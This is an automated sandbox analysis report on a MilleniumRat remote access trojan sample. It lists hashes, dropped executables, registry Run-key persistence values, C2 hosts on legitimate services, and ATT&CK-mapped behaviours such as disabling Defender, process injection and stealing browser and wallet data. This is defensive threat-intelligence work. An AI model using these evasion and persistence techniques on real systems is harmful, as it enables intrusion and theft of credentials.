milleniumrat | aa5f1188b6ee04b295860df6da0ee047395bd566508aa570249a07919cdf0db8

Analysis

max time kernel
150s
max time network
153s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
12-06-2024 06:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

main.exe
Size

37.2MB
MD5

31125c6581ea8f49e9e42c6d9d6b8240
SHA1

a18eb575c3a1b8fa27de21603008c4e204eecd81
SHA256

aa5f1188b6ee04b295860df6da0ee047395bd566508aa570249a07919cdf0db8
SHA512

9a4c84d6ad4c547f614df3521e2fb0f4ad2b5c885b31aa0cd14d43abb48ef3f8c935e3b498c26e5f6a4262d6d37e867f5a4a3f41e32aa09477b61e64fb80ea75
SSDEEP

786432:8RQBrRSY+R46huYqwAO4YoMGD6Oafw2827HokWhSnuvluwhNnlxM:8ROrRR+R4WurwAO49QY2LtW0nuDhNnnM

Score

10^/10

milleniumrat discovery evasion execution persistence pyinstaller rat spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
5524	MpCmdRun.exe

MilleniumRat
MilleniumRat is a remote access trojan written in C#.
rat stealer milleniumrat

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs

description	pid	Process	procid_target
PID 4664 created 3404	4664	setup.exe	54
PID 4664 created 3404	4664	setup.exe	54
PID 4664 created 3404	4664	setup.exe	54
PID 4664 created 3404	4664	setup.exe	54
PID 4664 created 3404	4664	setup.exe	54
PID 4664 created 3404	4664	setup.exe	54
PID 5400 created 3404	5400	updater.exe	54
PID 5400 created 3404	5400	updater.exe	54
PID 5400 created 3404	5400	updater.exe	54
PID 5400 created 3404	5400	updater.exe	54
PID 5400 created 3404	5400	updater.exe	54
PID 5400 created 3404	5400	updater.exe	54

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2860	powershell.exe
1744	powershell.exe
8484	powershell.exe
6192	powershell.exe
3460	powershell.exe

Contacts a large (1203) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 13 IoCs

pid	Process
4480	Build.exe
4956	hacn.exe
1068	based.exe
4184	hacn.exe
1740	based.exe
4564	s.exe
3756	main.exe
5052	svchost.exe
4616	svchost.exe
4664	setup.exe
6380	rar.exe
7432	Update.exe
5400	updater.exe

Loads dropped DLL 51 IoCs

pid	Process
4616	main.exe
4616	main.exe
4616	main.exe
4184	hacn.exe
4184	hacn.exe
1740	based.exe
1740	based.exe
1740	based.exe
1740	based.exe
1740	based.exe
1740	based.exe
1740	based.exe
1740	based.exe
1740	based.exe
1740	based.exe
1740	based.exe
1740	based.exe
1740	based.exe
1740	based.exe
1740	based.exe
1740	based.exe
1740	based.exe
1740	based.exe
3756	main.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
4616	svchost.exe
7432	Update.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 48 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000001ac19-57.dat	upx
behavioral1/memory/4616-61-0x00007FFD2FA50000-0x00007FFD3003A000-memory.dmp	upx
behavioral1/files/0x000700000001abf0-109.dat	upx
behavioral1/files/0x000700000001abef-108.dat	upx
behavioral1/files/0x000700000001abee-107.dat	upx
behavioral1/files/0x000700000001abed-106.dat	upx
behavioral1/files/0x000700000001abec-105.dat	upx
behavioral1/files/0x000700000001ac1c-104.dat	upx
behavioral1/files/0x000700000001ac1a-103.dat	upx
behavioral1/files/0x000700000001ac18-102.dat	upx
behavioral1/memory/1740-210-0x00007FFD2F5F0000-0x00007FFD2FBDA000-memory.dmp	upx
behavioral1/memory/1740-212-0x00007FFD436D0000-0x00007FFD436DF000-memory.dmp	upx
behavioral1/memory/1740-211-0x00007FFD43030000-0x00007FFD43053000-memory.dmp	upx
behavioral1/memory/1740-219-0x00007FFD42CA0000-0x00007FFD42CCD000-memory.dmp	upx
behavioral1/memory/1740-220-0x00007FFD43540000-0x00007FFD43559000-memory.dmp	upx
behavioral1/memory/1740-221-0x00007FFD42C70000-0x00007FFD42C93000-memory.dmp	upx
behavioral1/memory/1740-222-0x00007FFD3FD30000-0x00007FFD3FE9F000-memory.dmp	upx
behavioral1/memory/1740-224-0x00007FFD42C40000-0x00007FFD42C4D000-memory.dmp	upx
behavioral1/memory/1740-223-0x00007FFD42C50000-0x00007FFD42C69000-memory.dmp	upx
behavioral1/memory/1740-227-0x00007FFD2FCC0000-0x00007FFD30035000-memory.dmp	upx
behavioral1/memory/1740-226-0x00007FFD3FC70000-0x00007FFD3FD28000-memory.dmp	upx
behavioral1/memory/1740-230-0x00007FFD3FC60000-0x00007FFD3FC6D000-memory.dmp	upx
behavioral1/memory/1740-229-0x00007FFD42BF0000-0x00007FFD42C04000-memory.dmp	upx
behavioral1/memory/1740-236-0x00007FFD3D9C0000-0x00007FFD3DADC000-memory.dmp	upx
behavioral1/memory/1740-235-0x00007FFD2F5F0000-0x00007FFD2FBDA000-memory.dmp	upx
behavioral1/memory/1740-225-0x00007FFD42C10000-0x00007FFD42C3E000-memory.dmp	upx
behavioral1/memory/1740-1909-0x00007FFD43030000-0x00007FFD43053000-memory.dmp	upx
behavioral1/memory/1740-2145-0x00007FFD42C70000-0x00007FFD42C93000-memory.dmp	upx
behavioral1/memory/1740-2220-0x00007FFD3FD30000-0x00007FFD3FE9F000-memory.dmp	upx
behavioral1/memory/1740-2314-0x00007FFD3FC70000-0x00007FFD3FD28000-memory.dmp	upx
behavioral1/memory/1740-2313-0x00007FFD42C50000-0x00007FFD42C69000-memory.dmp	upx
behavioral1/memory/1740-2667-0x00007FFD2FCC0000-0x00007FFD30035000-memory.dmp	upx
behavioral1/memory/1740-2666-0x00007FFD42C10000-0x00007FFD42C3E000-memory.dmp	upx
behavioral1/memory/1740-2863-0x00007FFD2F5F0000-0x00007FFD2FBDA000-memory.dmp	upx
behavioral1/memory/1740-2874-0x00007FFD2FCC0000-0x00007FFD30035000-memory.dmp	upx
behavioral1/memory/1740-2873-0x00007FFD3FC60000-0x00007FFD3FC6D000-memory.dmp	upx
behavioral1/memory/1740-2872-0x00007FFD42C10000-0x00007FFD42C3E000-memory.dmp	upx
behavioral1/memory/1740-2871-0x00007FFD42C40000-0x00007FFD42C4D000-memory.dmp	upx
behavioral1/memory/1740-2870-0x00007FFD42C50000-0x00007FFD42C69000-memory.dmp	upx
behavioral1/memory/1740-2869-0x00007FFD3FD30000-0x00007FFD3FE9F000-memory.dmp	upx
behavioral1/memory/1740-2868-0x00007FFD42C70000-0x00007FFD42C93000-memory.dmp	upx
behavioral1/memory/1740-2867-0x00007FFD43540000-0x00007FFD43559000-memory.dmp	upx
behavioral1/memory/1740-2866-0x00007FFD42CA0000-0x00007FFD42CCD000-memory.dmp	upx
behavioral1/memory/1740-2865-0x00007FFD436D0000-0x00007FFD436DF000-memory.dmp	upx
behavioral1/memory/1740-2864-0x00007FFD43030000-0x00007FFD43053000-memory.dmp	upx
behavioral1/memory/1740-2885-0x00007FFD3FC70000-0x00007FFD3FD28000-memory.dmp	upx
behavioral1/memory/1740-2886-0x00007FFD3D9C0000-0x00007FFD3DADC000-memory.dmp	upx
behavioral1/memory/1740-2884-0x00007FFD42BF0000-0x00007FFD42C04000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\кокершмидт = "C:\\ProgramData\\svchost.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
77	discord.com
78	discord.com
7	raw.githubusercontent.com
8	raw.githubusercontent.com
12	raw.githubusercontent.com
76	raw.githubusercontent.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com
18	api.ipify.org
19	api.ipify.org

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4616	svchost.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4664 set thread context of 8968	4664	setup.exe	193
PID 5400 set thread context of 7632	5400	updater.exe	210
PID 5400 set thread context of 8292	5400	updater.exe	213
PID 5400 set thread context of 8416	5400	updater.exe	214

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	setup.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
8908	sc.exe
8932	sc.exe
7420	sc.exe
8880	sc.exe
8896	sc.exe
8944	sc.exe
7136	sc.exe
7288	sc.exe
6944	sc.exe
7364	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000900000001abe7-119.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Update.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2616	schtasks.exe
7656	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
7280	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
7400	WMIC.exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery

T1057

pid	Process
4104	tasklist.exe
4780	tasklist.exe
7056	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2100	systeminfo.exe

Modifies data under HKEY_USERS 62 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={E2BBCF38-C89A-4D17-8DDC-38EDD8C8C05C}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 12 Jun 2024 06:38:07 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718174285"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
9620	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2860	powershell.exe
2860	powershell.exe
1532	powershell.exe
1532	powershell.exe
1744	powershell.exe
1744	powershell.exe
4064	powershell.exe
4064	powershell.exe
3460	powershell.exe
3460	powershell.exe
2860	powershell.exe
1532	powershell.exe
2860	powershell.exe
4064	powershell.exe
1744	powershell.exe
3460	powershell.exe
1532	powershell.exe
1744	powershell.exe
1744	powershell.exe
4064	powershell.exe
4064	powershell.exe
3756	main.exe
3756	main.exe
3756	main.exe
3756	main.exe
3756	main.exe
3756	main.exe
3756	main.exe
3756	main.exe
3756	main.exe
3756	main.exe
3756	main.exe
3756	main.exe
3756	main.exe
3756	main.exe
3756	main.exe
3756	main.exe
3460	powershell.exe
5696	powershell.exe
5696	powershell.exe
5696	powershell.exe
5696	powershell.exe
6132	powershell.exe
6132	powershell.exe
6132	powershell.exe
6132	powershell.exe
7040	powershell.exe
7040	powershell.exe
7040	powershell.exe
7524	powershell.exe
7524	powershell.exe
7524	powershell.exe
7432	Update.exe
7432	Update.exe
7432	Update.exe
7432	Update.exe
7432	Update.exe
7432	Update.exe
7432	Update.exe
7432	Update.exe
7432	Update.exe
7432	Update.exe
7432	Update.exe
7432	Update.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4104	tasklist.exe
Token: SeDebugPrivilege	3756	main.exe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeIncreaseQuotaPrivilege	2444	WMIC.exe
Token: SeSecurityPrivilege	2444	WMIC.exe
Token: SeTakeOwnershipPrivilege	2444	WMIC.exe
Token: SeLoadDriverPrivilege	2444	WMIC.exe
Token: SeSystemProfilePrivilege	2444	WMIC.exe
Token: SeSystemtimePrivilege	2444	WMIC.exe
Token: SeProfSingleProcessPrivilege	2444	WMIC.exe
Token: SeIncBasePriorityPrivilege	2444	WMIC.exe
Token: SeCreatePagefilePrivilege	2444	WMIC.exe
Token: SeBackupPrivilege	2444	WMIC.exe
Token: SeRestorePrivilege	2444	WMIC.exe
Token: SeShutdownPrivilege	2444	WMIC.exe
Token: SeDebugPrivilege	2444	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2444	WMIC.exe
Token: SeRemoteShutdownPrivilege	2444	WMIC.exe
Token: SeUndockPrivilege	2444	WMIC.exe
Token: SeManageVolumePrivilege	2444	WMIC.exe
Token: 33	2444	WMIC.exe
Token: 34	2444	WMIC.exe
Token: 35	2444	WMIC.exe
Token: 36	2444	WMIC.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	4780	tasklist.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeDebugPrivilege	4064	powershell.exe
Token: SeDebugPrivilege	3460	powershell.exe
Token: SeIncreaseQuotaPrivilege	2444	WMIC.exe
Token: SeSecurityPrivilege	2444	WMIC.exe
Token: SeTakeOwnershipPrivilege	2444	WMIC.exe
Token: SeLoadDriverPrivilege	2444	WMIC.exe
Token: SeSystemProfilePrivilege	2444	WMIC.exe
Token: SeSystemtimePrivilege	2444	WMIC.exe
Token: SeProfSingleProcessPrivilege	2444	WMIC.exe
Token: SeIncBasePriorityPrivilege	2444	WMIC.exe
Token: SeCreatePagefilePrivilege	2444	WMIC.exe
Token: SeBackupPrivilege	2444	WMIC.exe
Token: SeRestorePrivilege	2444	WMIC.exe
Token: SeShutdownPrivilege	2444	WMIC.exe
Token: SeDebugPrivilege	2444	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2444	WMIC.exe
Token: SeRemoteShutdownPrivilege	2444	WMIC.exe
Token: SeUndockPrivilege	2444	WMIC.exe
Token: SeManageVolumePrivilege	2444	WMIC.exe
Token: 33	2444	WMIC.exe
Token: 34	2444	WMIC.exe
Token: 35	2444	WMIC.exe
Token: 36	2444	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2860	powershell.exe
Token: SeSecurityPrivilege	2860	powershell.exe
Token: SeTakeOwnershipPrivilege	2860	powershell.exe
Token: SeLoadDriverPrivilege	2860	powershell.exe
Token: SeSystemProfilePrivilege	2860	powershell.exe
Token: SeSystemtimePrivilege	2860	powershell.exe
Token: SeProfSingleProcessPrivilege	2860	powershell.exe
Token: SeIncBasePriorityPrivilege	2860	powershell.exe
Token: SeCreatePagefilePrivilege	2860	powershell.exe
Token: SeBackupPrivilege	2860	powershell.exe
Token: SeRestorePrivilege	2860	powershell.exe
Token: SeShutdownPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeSystemEnvironmentPrivilege	2860	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
7432	Update.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2004 wrote to memory of 4616	2004	main.exe	74
PID 2004 wrote to memory of 4616	2004	main.exe	74
PID 4616 wrote to memory of 4636	4616	main.exe	75
PID 4616 wrote to memory of 4636	4616	main.exe	75
PID 4636 wrote to memory of 4480	4636	cmd.exe	77
PID 4636 wrote to memory of 4480	4636	cmd.exe	77
PID 4636 wrote to memory of 4480	4636	cmd.exe	77
PID 4480 wrote to memory of 4956	4480	Build.exe	78
PID 4480 wrote to memory of 4956	4480	Build.exe	78
PID 4480 wrote to memory of 1068	4480	Build.exe	80
PID 4480 wrote to memory of 1068	4480	Build.exe	80
PID 4956 wrote to memory of 4184	4956	hacn.exe	81
PID 4956 wrote to memory of 4184	4956	hacn.exe	81
PID 1068 wrote to memory of 1740	1068	based.exe	82
PID 1068 wrote to memory of 1740	1068	based.exe	82
PID 4184 wrote to memory of 1368	4184	hacn.exe	83
PID 4184 wrote to memory of 1368	4184	hacn.exe	83
PID 1368 wrote to memory of 4564	1368	cmd.exe	85
PID 1368 wrote to memory of 4564	1368	cmd.exe	85
PID 1368 wrote to memory of 4564	1368	cmd.exe	85
PID 1740 wrote to memory of 1124	1740	based.exe	86
PID 1740 wrote to memory of 1124	1740	based.exe	86
PID 1740 wrote to memory of 704	1740	based.exe	87
PID 1740 wrote to memory of 704	1740	based.exe	87
PID 1740 wrote to memory of 4428	1740	based.exe	88
PID 1740 wrote to memory of 4428	1740	based.exe	88
PID 1740 wrote to memory of 2756	1740	based.exe	92
PID 1740 wrote to memory of 2756	1740	based.exe	92
PID 4564 wrote to memory of 3756	4564	s.exe	94
PID 4564 wrote to memory of 3756	4564	s.exe	94
PID 2756 wrote to memory of 4104	2756	cmd.exe	96
PID 2756 wrote to memory of 4104	2756	cmd.exe	96
PID 4564 wrote to memory of 5052	4564	s.exe	95
PID 4564 wrote to memory of 5052	4564	s.exe	95
PID 1740 wrote to memory of 3524	1740	based.exe	97
PID 1740 wrote to memory of 3524	1740	based.exe	97
PID 1740 wrote to memory of 96	1740	based.exe	99
PID 1740 wrote to memory of 96	1740	based.exe	99
PID 1740 wrote to memory of 1524	1740	based.exe	100
PID 1740 wrote to memory of 1524	1740	based.exe	100
PID 1740 wrote to memory of 3748	1740	based.exe	102
PID 1740 wrote to memory of 3748	1740	based.exe	102
PID 1740 wrote to memory of 3108	1740	based.exe	104
PID 1740 wrote to memory of 3108	1740	based.exe	104
PID 1740 wrote to memory of 4156	1740	based.exe	107
PID 1740 wrote to memory of 4156	1740	based.exe	107
PID 1740 wrote to memory of 5064	1740	based.exe	109
PID 1740 wrote to memory of 5064	1740	based.exe	109
PID 5052 wrote to memory of 4616	5052	svchost.exe	111
PID 5052 wrote to memory of 4616	5052	svchost.exe	111
PID 4428 wrote to memory of 1744	4428	cmd.exe	113
PID 4428 wrote to memory of 1744	4428	cmd.exe	113
PID 704 wrote to memory of 1532	704	cmd.exe	114
PID 704 wrote to memory of 1532	704	cmd.exe	114
PID 1124 wrote to memory of 2860	1124	cmd.exe	115
PID 1124 wrote to memory of 2860	1124	cmd.exe	115
PID 3748 wrote to memory of 1368	3748	cmd.exe	112
PID 3748 wrote to memory of 1368	3748	cmd.exe	112
PID 4564 wrote to memory of 4664	4564	s.exe	116
PID 4564 wrote to memory of 4664	4564	s.exe	116
PID 3108 wrote to memory of 1204	3108	cmd.exe	118
